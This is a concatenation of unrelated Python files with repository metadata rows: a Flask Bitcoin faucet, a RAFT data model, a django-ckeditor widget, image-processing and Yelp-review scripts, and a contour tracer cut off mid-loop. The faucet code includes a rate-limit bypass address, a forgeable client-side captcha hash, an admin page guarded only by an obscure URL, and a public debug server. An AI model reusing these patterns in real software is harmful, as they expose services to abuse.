    def save_db(self):
        """Insert object data into database."""
        query = "INSERT INTO drip_request"
        query += "(id, crdate, ip, address, coupon, trans_id)"
        query += "VALUES (NULL, datetime('now','localtime'), ?, ?, ?, ?)"
        g.db.execute(query, (self.ip, self.address, self.coupon, "UNSENT",))
        g.db.commit()

    def save(self):
        """Save drip request into database, enforcing rate/abuse limits.

        Raises LookupError when MAX_DRIPS is reached or the rate limit has
        not elapsed; returns self on success.
        """
        num_ip = self.count_unique("ip", self.ip)
        num_address = self.count_unique("address", self.address)
        last_req = last_request(self.ip)
        app.logger.debug("last_req:" + str(last_req))
        # testing address - remove before production
        if self.address == '12Ai7QavwJbLcPL5XS276fkYZpXPXTPFC7':
            self.save_db()
        elif last_req >= app.config['REQUEST_TIME_LIMIT']:
            # Bug fix: the format string was missing its placeholder, so the
            # logged message never contained the value.
            app.logger.info('Last Submit Time: {0}'.format(last_req))
            self.save_db()
        elif num_address >= app.config['MAX_DRIPS']:
            raise LookupError("Reached MAX_DRIPS.")
        elif num_ip >= app.config['MAX_DRIPS']:
            raise LookupError("Reached MAX_DRIPS.")
        else: # last_req < request time limit
            self.time_left = app.config['REQUEST_TIME_LIMIT'] - last_req
            raise LookupError("Timelimit error.")
        return self

    def send(self):
        """Return the (address, coupon) pair for the payout process."""
        return (self.address, self.coupon)
# Helper Functions -------------------------------------------------------------
def last_request(ip):
    """Return the number of minutes since the last drip request by passed ip."""
    query = "SELECT * FROM drip_request WHERE ip=? ORDER BY id DESC"
    last_req = g.db.execute(query, (ip,)).fetchone()
    if last_req == None:
        # if no listing found then this is probably the users first time using
        # the faucet, so return the default time request limit + 1, so that the
        # system will allow them a drip request
        return int(app.config['REQUEST_TIME_LIMIT'] + 1)
    else:
        # convert database string to datetime (crdate is column 1)
        req_datetime = datetime.strptime(last_req[1], "%Y-%m-%d %H:%M:%S")
        diff_time = datetime.now() - req_datetime
        diff_time = divmod(diff_time.total_seconds(), 60)
        return int(diff_time[0])  # minutes since last request
def sub_cypher(ip, offset):
    """
    A basic number-substitution cypher using a numeric offset; used to
    obfuscate IP addresses before they are displayed publicly.

    Avoid offsets 0-9: every output digit would collapse to 0 or 1. The
    mapping is easily reversed when the offset is known; a suggested
    stronger alternative is rotate((ip % sum1bits(ip)), sum0bits(ip)).
    """
    obfuscated = []
    for ch in ip:
        if ch.isdigit():
            obfuscated.append(abs(int(ch) - offset) % 10)
        else:
            obfuscated.append('.')
    return obfuscated
def get_html(save_time, ip, trans_id):
    """Transform one drip_request row into an HTML table row.

    save_time -- 'YYYY-MM-DD HH:MM:SS' string from the crdate column.
    ip        -- requester IP (obfuscated before display).
    trans_id  -- transaction id, or the sentinel 'UNSENT' while pending.
    """
    # Age of the request relative to now, as "<mins> mins, <secs> secs ago".
    diff_time = datetime.now() - datetime.strptime(save_time, "%Y-%m-%d %H:%M:%S")
    diff_time = divmod(diff_time.total_seconds(), 60)
    diff_time = "{0} mins, {1} secs ago".format(int(diff_time[0]), int(diff_time[1]))
    # Obfuscate the IP before public display (see sub_cypher).
    obfuscated_ip = ''.join(map(str, sub_cypher(list(ip), 756)))
    if trans_id == "UNSENT":
        html = "<tr><td>{0}</td><td>{1}</td><td>Processing...</td></tr>"
        return html.format(diff_time, obfuscated_ip)
    else:
        # Link to the block explorer, showing a truncated transaction id.
        short_trans_id = trans_id[:37] + "..."
        trans_url = app.config['BLOCK_EXPLORER_URL'] + trans_id
        html = "<tr><td>{0}</td><td>{1}</td><td><a href='{2}'>{3}</a></td></tr>"
        return html.format(diff_time, obfuscated_ip, trans_url, short_trans_id)
def get_index(form_submit_status = None):
    """Displays the default index page, or a success / error page."""
    # generate and hash the captcha; only the SHA-1 of the answer travels
    # to the client via a hidden input (see the TODO about salting in add()).
    captcha_raw = (randint(1, 15), randint(1, 15))
    captcha = str(int(captcha_raw[0] - captcha_raw[1])).encode('utf-8')
    captcha_hash = hashlib.sha1(captcha).hexdigest()
    # retrieve last drip requests (newest first)
    query = 'SELECT * FROM drip_request ORDER BY id DESC LIMIT 10'
    recent = g.db.execute(query)
    recent = [get_html(row[1], row[2], row[5]) for row in recent.fetchall()]
    recent = ''.join(map(str, recent))
    # find total number of transactions (TOTAL_TRANS is a configured base
    # offset added to the live row count)
    cur = g.db.execute('SELECT Count(*) FROM drip_request')
    total_trans = app.config['TOTAL_TRANS'] + int(cur.fetchone()[0])
    stats = "{:,}".format(total_trans)
    # find time since last drip request
    last_req = app.config['REQUEST_TIME_LIMIT']
    last_req -= last_request(str(request.remote_addr))
    # pass all data to the template for rendering
    return render_template('index.html', recent=recent,
                           form_submit=form_submit_status,
                           captcha_x=captcha_raw[0], captcha_y=captcha_raw[1],
                           captcha_awns=captcha_hash, stats=stats,
                           last_req=last_req)
def get_coupons_html(access_key, coup_value, max_use):
    """Render one coupon record as an HTML table row."""
    cells = "<td>{0}</td><td>{1}</td><td>{2}</td>".format(
        access_key, coup_value, max_use)
    return "<tr>" + cells + "</tr>"
def get_coupons():
    """Render the coupon list page (served from the admin route)."""
    query = 'SELECT * FROM coupon_list'
    c = g.db.execute(query)
    # Columns used: row[3] = access key, row[1] = value, row[2] = max uses
    # -- inferred from get_coupons_html's parameters; TODO confirm schema.
    c = [get_coupons_html(row[3], row[1], row[2]) for row in c.fetchall()]
    c = ''.join(map(str, c))
    return render_template('coupons.html', coupons=c)
# Routes -----------------------------------------------------------------------
@app.route('/')
def index():
    # Front page.
    return get_index()

@app.route('/add', methods=['POST'])
def add():
    """Handle a faucet submission: captcha check, validation, rate limits."""
    # grab data
    ip = str(request.remote_addr)
    address = request.form['address']
    coupon = request.form['coupon']
    try:
        # convert user submitted captcha to an sha-1 hash
        # since the captcha is passed through a hidden input we need to obscure
        # the answer from the user. we do this by hashing the solution.
        captcha = str(request.form['captcha']).encode('utf-8')
        captcha_user = hashlib.sha1(captcha).hexdigest()
        captcha_awn = request.form['captcha_awns']
        # compare sha-1 hash of correct captcha and user submitted solution
        if not captcha_user == captcha_awn:
            app.logger.info('Invalid Captcha from {0}'.format(ip))
            raise ValueError("Invalid captcha")
        # TODO: salting also needs to be added as the user could simply modify
        # the html and insert a hash they know the answer to
        # create a drip request object. the constructor will validate the
        # input before adding the drip request to the database
        drip = DripRequest(address, coupon, ip)
        app.logger.info("Good drip: {0}".format(drip.save()))
        return redirect(url_for('good'))
    except ValueError as e:
        # raised for invalid address/IP/captcha
        app.logger.info("Bad Address: {0} from {1}".format(address, ip))
        app.logger.info("Error Detail: {0}".format(e))
        return redirect(url_for('bad'))
    except LookupError as e:
        # raised by DripRequest.save() for rate limits / duplicates
        app.logger.info("Duplicate Address: {0} from {1}".format(address, ip))
        app.logger.info("Error Detail: {0}".format(e))
        return redirect(url_for('duplicate'))
    except:
        # ValueError and LookupError are raised on purpose, all other
        # errors should be considered logical bugs
        app.logger.error("Unexplained Error: {0}".format(sys.exc_info()[0]))
        return redirect(url_for('bad'))

# submission result pages
@app.route('/good')
def good(): return get_index("good")

@app.route('/bad')
def bad(): return get_index("bad")

@app.route('/duplicate')
def duplicate(): return get_index("duplicate")

# static pages
@app.route('/forum')
def forum(): return render_template('forum.html')

@app.route('/resources')
def resources(): return render_template('resources.html')

@app.route('/guide')
def guide(): return render_template('guide.html')

# admin pages -- NOTE(review): "protected" only by an obscure URL.
@app.route('/coupon123')
def coupon123(): return get_coupons()
# Main -------------------------------------------------------------------------
if __name__ == '__main__':
    # logging: rotate a small local file, capture DEBUG and above
    handler = RotatingFileHandler('foo.log', maxBytes=10000, backupCount=1)
    handler.setLevel(logging.DEBUG)
    handler.setFormatter(Formatter('%(asctime)s %(levelname)s: %(message)s '
                                   '[in %(pathname)s:%(lineno)d]'))
    app.logger.addHandler(handler)
    # debug web server -- development only; debug=True must not be deployed
    app.run(host='0.0.0.0', port=5000, debug=True)
|
UTF-8
|
Python
| false | false | 2,013 |
5,549,097,753,820 |
4d5eaebfb51ec08e39faad3bc95cb0b4b78169b7
|
bfc874767de27c84f3b61b7b5d0b6a4ee1fefb7f
|
/core/data/SpiderPendingResponsesDataModel.py
|
ee88914eb6e087b42033ac300f2743446c2758c4
|
[
"GPL-3.0-only"
] |
non_permissive
|
pombreda/raft
|
https://github.com/pombreda/raft
|
294774b70d07fb4b7d57fac3ddb92e2681fb6a7f
|
c81c5778a8113e3c7095334ed91dc68352e5da5d
|
refs/heads/master
| 2021-01-01T19:07:04.417738 | 2014-08-12T21:17:50 | 2014-08-12T21:17:50 | 32,209,251 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#
# This module supports the data model for the spider results
#
# Author: Gregory Fleischer ([email protected])
#
# Copyright (c) 2011 RAFT Team
#
# This file is part of RAFT.
#
# RAFT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RAFT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RAFT. If not, see <http://www.gnu.org/licenses/>.
#
from core.data.DataTableDataModel import DataTableDataModel
from core.database.constants import SpiderPendingResponsesTable
class SpiderPendingResponsesDataModel(DataTableDataModel):
    """Tabular data model for spider responses that are still pending."""

    # (column header, database column index) pairs, in display order.
    ITEM_DEFINITION = (
        ('#', SpiderPendingResponsesTable.RESPONSE_ID),
        ('Type', SpiderPendingResponsesTable.REQUEST_TYPE),
        ('Depth', SpiderPendingResponsesTable.DEPTH),
        ('Status', SpiderPendingResponsesTable.STATUS),
    )

    def __init__(self, framework, parent = None):
        DataTableDataModel.__init__(self, framework, SpiderPendingResponsesDataModel.ITEM_DEFINITION, parent)
|
UTF-8
|
Python
| false | false | 2,014 |
16,389,595,242,273 |
4be3baa702078efa84c3e0ea506ee5f5b6648607
|
895daa2816d6f1ccfc9352e0512a938760fe1ce8
|
/ckeditor/widgets.py
|
25c1f3bc90ad93cb4f04144c48598cb113320eb5
|
[
"BSD-3-Clause"
] |
permissive
|
oysnet/django-ckeditor
|
https://github.com/oysnet/django-ckeditor
|
374ef5da7e211ef4e466bf402eca6f229b35ee4b
|
7a8d39520a0abbce4cf74d49a43f322fb18a449c
|
refs/heads/master
| 2021-01-17T23:05:22.513512 | 2012-10-25T09:46:55 | 2012-10-25T09:46:55 | 1,397,323 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django import forms
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils.safestring import mark_safe
from django.utils.html import conditional_escape
from django.utils.encoding import force_unicode
from django.utils import simplejson
from django.core.exceptions import ImproperlyConfigured
from django.forms.util import flatatt
from copy import deepcopy
# Reusable JSON encoder, bound once at import time.
json_encode = simplejson.JSONEncoder().encode

# Baseline CKEditor options; settings.CKEDITOR_CONFIGS entries replace this
# wholesale in CKEditorWidget.__init__.
DEFAULT_CONFIG = {
    'skin': 'kama',
    'toolbar': 'Full',
    'height': 291,
    'width': 618,
    'filebrowserWindowWidth': 940,
    'filebrowserWindowHeight': 747,
}
class CKEditorWidget(forms.Textarea):
    """
    Widget providing CKEditor for Rich Text Editing.
    Supports direct image uploads and embed.
    """
    class Media:
        try:
            js = (
                settings.STATIC_URL + 'ckeditor/ckeditor/ckeditor.js',
            )
        except AttributeError:
            raise ImproperlyConfigured("django-ckeditor requires CKEDITOR_MEDIA_PREFIX setting. This setting specifies a URL prefix to the ckeditor JS and CSS media (not uploaded media). Make sure to use a trailing slash: CKEDITOR_MEDIA_PREFIX = '/media/ckeditor/'")

    def __init__(self, config_name='default', *args, **kwargs):
        super(CKEditorWidget, self).__init__(*args, **kwargs)
        # Setup config from defaults.
        # Bug fix: assigning DEFAULT_CONFIG directly aliased the shared
        # module-level dict; render() mutates self.config, so every widget
        # instance (and the defaults themselves) leaked each other's URLs.
        self.config = deepcopy(DEFAULT_CONFIG)
        # Try to get valid config from settings.
        configs = getattr(settings, 'CKEDITOR_CONFIGS', None)
        if configs is not None:
            if isinstance(configs, dict):
                # `in` replaces the deprecated dict.has_key() (removed in
                # Python 3); behaviour is identical.
                if config_name in configs:
                    config = configs[config_name]
                    # Make sure the configuration is a dictionary.
                    if not isinstance(config, dict):
                        raise ImproperlyConfigured('CKEDITOR_CONFIGS["%s"] setting must be a dictionary type.' % config_name)
                    # Override defaults with settings config (full replace,
                    # matching the original behaviour).
                    self.config = deepcopy(config)
                else:
                    raise ImproperlyConfigured("No configuration named '%s' found in your CKEDITOR_CONFIGS setting." % config_name)
            else:
                raise ImproperlyConfigured('CKEDITOR_CONFIGS setting must be a dictionary type.')
        # Prefix any contentsCss entries with STATIC_URL.
        if 'contentsCss' in self.config:
            if isinstance(self.config['contentsCss'], (list, tuple)):
                self.config['contentsCss'] = [settings.STATIC_URL + css for css in self.config['contentsCss']]
            else:
                self.config['contentsCss'] = settings.STATIC_URL + self.config['contentsCss']

    def render(self, name, value, attrs=None):
        """Render the textarea plus the CKEDITOR.replace bootstrap script.

        Bug fix: `attrs={}` was a mutable default shared across all calls;
        `None` with a fallback gives each call a fresh dict.
        """
        if value is None: value = ''
        final_attrs = self.build_attrs(attrs or {}, name=name)
        # File browser endpoints are resolved per render; self.config is a
        # per-instance copy (see __init__), so this mutation is safe.
        self.config['filebrowserUploadUrl'] = reverse('ckeditor_upload')
        self.config['filebrowserBrowseUrl'] = reverse('ckeditor_browse')
        return mark_safe(u'''<textarea%(attr)s>%(value)s</textarea>
        <script type="text/javascript">
        if(typeof(%(id_s)s_id) === 'undefined') {
            %(id_s)s_id = "%(id)s";
            %(id_s)s_timer = null;
            %(id_s)s_config = %(config)s
        } else if (%(id_s)s_timer !== null) {
            clearTimeout(%(id_s)s_timer);
        }
        %(id_s)s_timer = setTimeout( function() {
            if (!CKEDITOR.instances[%(id_s)s_id]) {
                CKEDITOR.replace(%(id_s)s_id, %(id_s)s_config);
            }
            %(id_s)s_timer = null;
        }, 100);
        </script>''' % {'attr':flatatt(final_attrs), 'value':conditional_escape(force_unicode(value)), 'id':final_attrs['id'], 'id_s' :final_attrs['id'].replace('-','_'), 'config':json_encode(self.config)})
|
UTF-8
|
Python
| false | false | 2,012 |
9,620,726,774,181 |
0128c30d3aa632dff87ea4f7d0cb1fab71644bac
|
f1e5d5e9d2286299ace98d120042ab59f1471a8f
|
/CS4495_Computer_Vision/Problem_Set_0/PS0-4/PS0-4-code.py
|
a40c02b868b94f995e43c36914f1a0922536ae44
|
[] |
no_license
|
CardenB/Programming-Assignments
|
https://github.com/CardenB/Programming-Assignments
|
c2c7d8855e5d724bb906ed0f1d1b7f395e0f7e05
|
9225117ab272c916f3107e4ee4dac56a527e68cf
|
refs/heads/master
| 2016-09-08T11:45:44.412431 | 2014-09-26T13:58:26 | 2014-09-26T13:58:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import numpy as np
import cv2
import os
def part4(M1g):
    """PS0-4: print image statistics, normalise contrast, shift left, diff.

    M1g -- image array from cv2.imread (H x W x C; assumed uint8).
    Side effects: writes ps0-4-b-1.png, ps0-4-c-1.png and ps0-4-d-1.png.
    """
    minPix = np.amin(M1g)
    maxPix = np.amax(M1g)
    meanPix = np.mean(M1g)
    stdDev = np.std(M1g)
    print("min: {0}, max: {1}, mean: {2}, std. dev.: {3}".format(minPix, maxPix, meanPix, stdDev))
    # Normalise: subtract mean, divide by std dev, rescale, add mean back.
    # Bug fix: work in float -- in-place float arithmetic on the uint8 copy
    # either wraps around or is rejected by numpy's casting rules.
    newImg = M1g.astype(np.float64)
    newImg -= meanPix
    newImg /= stdDev
    # multiply by 10 (if image is 0->255) or 0.05 (if image 0.0->1.0)
    if np.amax(newImg) > 1.0:
        print("multiplying by 10")
        newImg *= 10
    else:
        print("multiplying by 0.05")
        newImg *= 0.05
    newImg += meanPix
    cv2.imwrite('ps0-4-b-1.png', newImg)
    # Shift M1g left by 2 pixels and output the image.
    pixelShift = 2
    shiftImg = M1g.copy()
    shiftImg[:, :-pixelShift, :] = shiftImg[:, pixelShift:, :]
    # Bug fix: the original zeroed shiftImg[-pixelShift:0, :, :], which is an
    # empty slice (and the wrong axis), so nothing happened. Blank the
    # rightmost columns that no longer have source data after the shift.
    shiftImg[:, -pixelShift:, :] = 0
    cv2.imwrite('ps0-4-c-1.png', shiftImg)
    # Difference image, clamped to legal (non-negative) pixel values.
    # Bug fixes: subtract in a signed dtype so negatives can exist before
    # clipping (uint8 would wrap), and keep np.clip's result -- the original
    # discarded it, since np.clip returns a new array.
    diff = M1g.astype(np.int16) - shiftImg.astype(np.int16)
    diff = np.clip(diff, 0, 255).astype(np.uint8)
    cv2.imwrite('ps0-4-d-1.png', diff)
if __name__ == '__main__':
    # Resolve the input image relative to this script so it works from any
    # working directory.
    curDir = os.path.dirname(__file__)
    fileName1 = os.path.join(curDir, '../PS0-2/ps0-2-b-1.png')
    img1 = cv2.imread(fileName1)
    part4(img1)
|
UTF-8
|
Python
| false | false | 2,014 |
15,857,019,275,721 |
fd243e3ecf8f0bcaca4e6f28406a2ba207cf9988
|
7ffc46147f4ec7adb79f471cef0f76e5f686a109
|
/src/demo/review.py
|
e8544682c6d3840e386687552d9df2c67565af2f
|
[] |
no_license
|
luoyangylh/FindSpamStore
|
https://github.com/luoyangylh/FindSpamStore
|
c1b1aaef889ac2fbc1c85b2483207c57200e298d
|
c39a173635f7d636a787e7c4a6d46b07659cbec4
|
refs/heads/master
| 2020-04-06T06:38:43.330793 | 2014-04-29T20:56:48 | 2014-04-29T20:56:48 | 19,287,351 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import io,json,string

# Yelp business ids flagged as suspected spam stores; only their reviews
# are extracted for the demo page.
spamStores = ["koCfyexzjjF3pZrzijlL3g","hAq4y3FK6tRbjfjvfXAaww","ZZlMGUiKZNiDyPLmra7RZQ","frZdH7hTGIs7nykH4jeIPA","Tg0D45xHJBN0jOMq_v04XA","x0NOgX6P4x-82cC0kcO1hg","0yBs5wbVw9gTIDe9Z-rMTg","jHte0SjUldZeDDZ5py0ZhA","d87fxJ47AzTlREZCnUmaFA","oMycF1cQgR1UVkafXfof7A","IkSF5GEHcl7DePGlXksl5A","pSiR8m18iick2D7TFdmb-Q","fmuj7u1gflmEjW-h0v9bwg","SPBZxmt8_nT30rNVnKHYKA","0vzZ_Bcb02rJljeMU9XkBw","UedVu1tCV_Q3twZZtwtl8Q","vA8T8QXh78iSXhxShLNgQA","SkcccvAydbt5zlQI0EUL2g","zp713qNhx8d9KCJJnrw1xA","cc9KFNrcY9gA7t9D1a3FpA"]

# Map user_id -> display name from the Yelp academic user dump
# (one JSON object per line).
userNameId = {}
with open("yelp_academic_dataset_user.json", "r") as file:
    for line in file:
        record = json.loads(line[:-1])  # strip the trailing newline
        userNameId[record["user_id"]] = record["name"]

# Group review snippets by business id, for spam stores only.
# Bug fix: the original only reset `revs = []` for an unseen business and
# otherwise appended to whichever list the previous iteration left bound to
# `revs`, so interleaved review lines could be filed under the wrong store.
# setdefault() always appends to the list belonging to this business id.
reviewDic = {}
with open("restaurant_grouped_ranked_reviews.json", "r") as file:
    for line in file:
        l = json.loads(line[:-1])
        business_id = l["business_id"]
        if business_id in spamStores:
            entry = ('{"userName":"' + userNameId[l["user_id"]]
                     + '","review":' + json.dumps(l["text"].encode('utf-8')) + "}")
            reviewDic.setdefault(business_id, []).append(entry)

# Emit a JavaScript object literal: {"<business_id>": [<review objects>,],}
with open("r.js", "w+") as wFile:
    wFile.write("var REVIEWS = {")
    for key in reviewDic.keys():
        wFile.write('"' + key + '":')
        wFile.write('[')
        for entry in reviewDic[key]:
            wFile.write(entry)
            wFile.write(',')
        wFile.write('],')
    wFile.write("}")
|
UTF-8
|
Python
| false | false | 2,014 |
10,642,928,980,857 |
a26fb9729c8ed7bae79c4aab42f90ecd45a564f8
|
a5fa6cb3b4f0fab4d8f281a290ac0c46a3032a5d
|
/www/member.py
|
9495b47a1aeb00a3068ffa533b1f437c0cd0416a
|
[] |
no_license
|
borisnieuwenhuis/restify
|
https://github.com/borisnieuwenhuis/restify
|
4295bec66041bf6749d6ad98bfe4ba65c5831404
|
20ed26663b959231e0f4e066b999a2a0e443ad71
|
refs/heads/master
| 2021-01-13T02:03:12.062699 | 2012-04-27T15:17:02 | 2012-04-27T15:17:02 | 3,143,767 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from google.appengine.ext import db
class Member(db.Model):
    """App Engine datastore entity for a member; only `name` is mandatory."""
    name = db.StringProperty(required = True)
    lastname = db.StringProperty(required = False)
|
UTF-8
|
Python
| false | false | 2,012 |
11,175,504,935,117 |
10d815ecb5fe1d0ed514ad654ea7ed96223fab87
|
b0c5e117d230a2aacf65ce3397b9d013da4ab4fa
|
/fursten/src/fursten/diagram/contour.py
|
1bd4376729419af75e6c3953ff135b19ff3ccb7f
|
[] |
no_license
|
lunkan/Fursten
|
https://github.com/lunkan/Fursten
|
8647a79eeb590cceb9e822f5c435c12c78513731
|
63b70a9f45f70b3bf1dc2514ed2161c52e6b1637
|
refs/heads/master
| 2020-05-18T20:19:50.305457 | 2013-12-27T13:11:09 | 2013-12-27T13:11:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding:utf-8 -*-
"""
Created on 22 sep 2012
@author: Olof Manbo
Version: 1.0.0
"""
import time
import logging
import createPath
# Marching-squares lookup tables. Each key is a 2x2 cell of 0/1 corner
# classifications, laid out as ((v(x,y), v(x+1,y)), (v(x,y+1), v(x+1,y+1)))
# -- see how contour_newer builds its key T. The value gives the start and
# end point [x, y] (in cell-local 0..1 coordinates) of the contour segment
# crossing that cell. The all-equal cells ((0,0),(0,0)) / ((1,1),(1,1)) are
# deliberately absent: no contour passes through them.
LT = {((0,0),
       (1,0)):
      [[0.0, 0.5],
       [0.5, 1.0]],
      ((0,0),
       (0,1)):
      [[0.5, 1.0],
       [1.0, 0.5]],
      ((0,0),
       (1,1)):
      [[0.0, 0.5],
       [1.0, 0.5]],
      ((0,1),
       (0,0)):
      [[1.0, 0.5],
       [0.5, 0.0],
      ],
      ((0,1),
       (0,1)):
      [[0.5, 1.0],
       [0.5, 0.0]],
      ((0,1),
       (1,1)):
      [[0.0, 0.5],
       [0.5, 0.0]],
      ((1,0),
       (0,0)):
      [[0.5, 0.0],
       [0.0, 0.5]],
      ((1,0),
       (1,0)):
      [[0.5, 0.0],
       [0.5, 1.0]],
      ((1,0),
       (1,1)):
      [[0.5, 0.0],
       [1.0, 0.5]],
      ((1,1),
       (0,0)):
      [[1.0, 0.5],
       [0.0, 0.5]],
      ((1,1),
       (1,0)):
      [[1.0, .5],
       [0.5, 1.0]],
      ((1,1),
       (0,1)):
      [[0.5, 1.0],
       [0.0, 0.5]],
      }

# The two ambiguous "saddle" cells (diagonally opposite corners inside the
# region): each maps to TWO segments instead of one.
LT_2 = {((0,1),
         (1,0)):
        [[[0.0, 0.5],
          [0.5, 0.0]],
         [[1.0, 0.5],
          [0.5, 1.0]]],
        ((1,0),
         (0,1)):
        [[[0.5, 0.0],
          [1.0, 0.5]],
         [[0.5, 1.0],
          [0.0, 0.5]]],
        }

logger = logging.getLogger('console')
def contour_newer(data, X, Y, number_of_types):
    """Extract contour segments for each region type via marching squares.

    data -- 2D grid indexed [x][y] of integer type labels (0 = none).
    X, Y -- world-coordinate ranges the grid covers; cell (x_l, y_l) maps
            to grid index (x_l - X[0], y_l - Y[0]).
    number_of_types -- number of distinct non-zero labels.

    Returns a list with one entry per type (starting at label 1); each
    entry is a list of [[x0, y0], [x1, y1]] segments in world coordinates.
    """
    lines = [[] for dummy in range(number_of_types + 1)]
    for y_l in Y[:-1]:
        for x_l in X[:-1]:
            y = y_l - Y[0]
            x = x_l - X[0]
            for colornumber in range(1, number_of_types + 1):
                # 2x2 binary cell: is each corner inside this colour region?
                # Bug fix: a misplaced parenthesis made the top-right entry
                # `int(...) == colornumber` (a bool); the lookup still worked
                # because True/1 hash equal, but the key is now a true int.
                T = ((int(data[x][y] == colornumber), int(data[x + 1][y] == colornumber)),
                     (int(data[x][y + 1] == colornumber), int(data[x + 1][y + 1] == colornumber)))
                # `in` replaces dict.has_key(), which is removed in Python 3.
                if T in LT:
                    lines[colornumber].append([[x_l + LT[T][0][0], y_l + LT[T][0][1]],
                                               [x_l + LT[T][1][0], y_l + LT[T][1][1]]])
                elif T in LT_2:
                    # Saddle cell: contributes two segments.
                    lines[colornumber].append([[x_l + LT_2[T][0][0][0], y_l + LT_2[T][0][0][1]],
                                               [x_l + LT_2[T][0][1][0], y_l + LT_2[T][0][1][1]]])
                    lines[colornumber].append([[x_l + LT_2[T][1][0][0], y_l + LT_2[T][1][0][1]],
                                               [x_l + LT_2[T][1][1][0], y_l + LT_2[T][1][1][1]]])
    return lines[1:]
def lineify(lines):
    """Chain individual contour segments into continuous polylines.

    lines -- list of [[x0, y0], [x1, y1]] segments; consumed (emptied).
    Returns a list of [xs, ys] coordinate-list pairs, one per polyline.
    Each segment contributes both endpoints, so interior junction points
    appear twice in the output lists.
    """
    polylines = []
    segment = lines.pop(0)
    xs = [segment[0][0], segment[1][0]]
    ys = [segment[0][1], segment[1][1]]
    while segment is not None:
        # Look for a segment starting where the current one ends.
        successor = None
        for candidate in lines:
            if segment[1] == candidate[0]:
                successor = candidate
                break
        if successor is not None:
            xs += [successor[0][0], successor[1][0]]
            ys += [successor[0][1], successor[1][1]]
            lines.remove(successor)
            segment = successor
        elif lines:
            # Dead end, but unused segments remain: close this polyline
            # and start a new one from the next segment.
            polylines.append([xs, ys])
            segment = lines.pop(0)
            xs = [segment[0][0], segment[1][0]]
            ys = [segment[0][1], segment[1][1]]
        else:
            polylines.append([xs, ys])
            segment = None
    return polylines
def getSvg(scale, nodes, node_names, X, Y):
    """Render node regions as SVG path markup.

    Returns (svg_markup, real_data) where real_data is the rasterised
    ownership grid produced by getPaths.
    """
    paths, real_data = getPaths(scale, nodes, node_names, X, Y)
    retval = ""
    for d in paths:
        # createPath.path(points, class) -- note the embedded newline after
        # the node name is part of the original output format.
        retval += createPath.path(d[0], "node_%s\n" % d[1])
    return retval, real_data
def getPaths(scale, nodes_dict, colors_for_map, world_width, world_height):
    """Rasterize node groups into nearest-group regions and trace their outlines.

    For every grid point (downscaled by ``scale``) the nearest node within
    radius R determines the point's colour (group index + 1, 0 = none).
    Nodes are pre-bucketed into an N x N grid of boxes so only nearby boxes
    are scanned per grid point.  The resulting raster is contoured with
    contour_newer(), the segments chained with lineify(), smoothed with a
    5-point wrap-around moving average, and converted to SVG path data via
    createPath.d().

    Returns (paths, real_data) where each path entry is
    [svg_d_string, node_name, colors_for_map[node_name]] and real_data is
    the colour raster (indexed [x][y]).
    """
    # Grid coordinates in downscaled world units, centred on the origin.
    X = range(-world_width/scale/2, world_width/scale/2)
    Y = range(-world_height/scale/2, world_height/scale/2)
    node_names = nodes_dict.keys()
    nodes = []
    for node_name in node_names:
        nodes.append(nodes_dict[node_name])
    scale = float(scale)
    t0 = time.time()
    # Influence radius of a node (downscaled); distances compared squared.
    R = 1000/scale
    R_2 = R*R
    # Spatial bucketing: N x N boxes covering the world.
    N = 10
    split_x = [(-world_width/2 + world_width/N*n)/scale for n in xrange(0, N + 2)]
    split_y = [(-world_height/2 + world_height/N*n)/scale for n in xrange(0, N + 2)]
    real_data = []
    # boxes[group][box_x][box_y] -> list of downscaled [x, y] node positions.
    boxes = [ [ [[] for dummy in split_y[:-1]] for dummy in split_x[:-1]] for dummy in nodes]
    for box_n, node_list in enumerate(nodes):
        for node in node_list:
            for n in xrange(len(split_x) - 1):
                if split_x[n] < node[0]/scale <= split_x[n + 1]:
                    box_x = n
            for n in xrange(len(split_y) - 1):
                if split_y[n] < node[1]/scale <= split_y[n + 1]:
                    box_y = n
            # NOTE(review): if a node falls outside every split interval,
            # box_x/box_y keep their previous values (or are undefined on the
            # very first node) -- presumably inputs always lie in-world; confirm.
            boxes[box_n][box_x][box_y].append([node[0]/scale, node[1]/scale])
    for x in X:
        real_data.append([])
        for y in Y:
            # Force a background border so every region contour is closed.
            if x == X[0] or x == X[-1] or y == Y[0] or y == Y[-1]:
                real_data[-1].append(0)
            else:
                min_distance = R_2
                colornumber = 0
                for box_n, box_list in enumerate(boxes):
                    # Only boxes within R of this grid point need scanning.
                    box_x_s = []
                    box_y_s = []
                    for n in xrange(len(split_x) - 1):
                        if (split_x[n] - R) < x <= (split_x[n + 1] + R):
                            box_x_s.append(n)
                    for n in xrange(len(split_y) - 1):
                        if (split_y[n] - R) < y <= (split_y[n + 1] + R):
                            box_y_s.append(n)
                    node_list = []
                    for box_x in box_x_s:
                        for box_y in box_y_s:
                            node_list += box_list[box_x][box_y]
                    # Nearest node (within R) wins; its group sets the colour.
                    for node in node_list:
                        delta_x = x - node[0]
                        delta_y = y - node[1]
                        distance = (delta_x*delta_x + delta_y*delta_y)
                        if distance < min_distance:
                            min_distance = distance
                            colornumber = box_n + 1
                real_data[-1].append(colornumber)
    logger.info("getSvg()::before contour time:%f"%(time.time() - t0))
    lines = contour_newer(real_data, X, Y, len(node_names))
    retval = ''
    paths = []
    for line_list, node_name in zip(lines, node_names):
        if line_list != []:
            full_lines = lineify(line_list)
            d = ""
            for line in full_lines:
                # Smooth each polyline with a 5-point moving average over
                # offsets -4, -2, 0, +2, +4 (wrap-around via modulo), then
                # scale back up to world coordinates.
                x = []
                y = []
                NX = len(line[0])
                NY = len(line[1])
                for nx in range(NX):
                    nx_0 = (nx - 4)%NX
                    nx_1 = (nx + 2)%NX
                    nx_3 = (nx - 2)%NX
                    nx_4 = (nx + 4)%NX
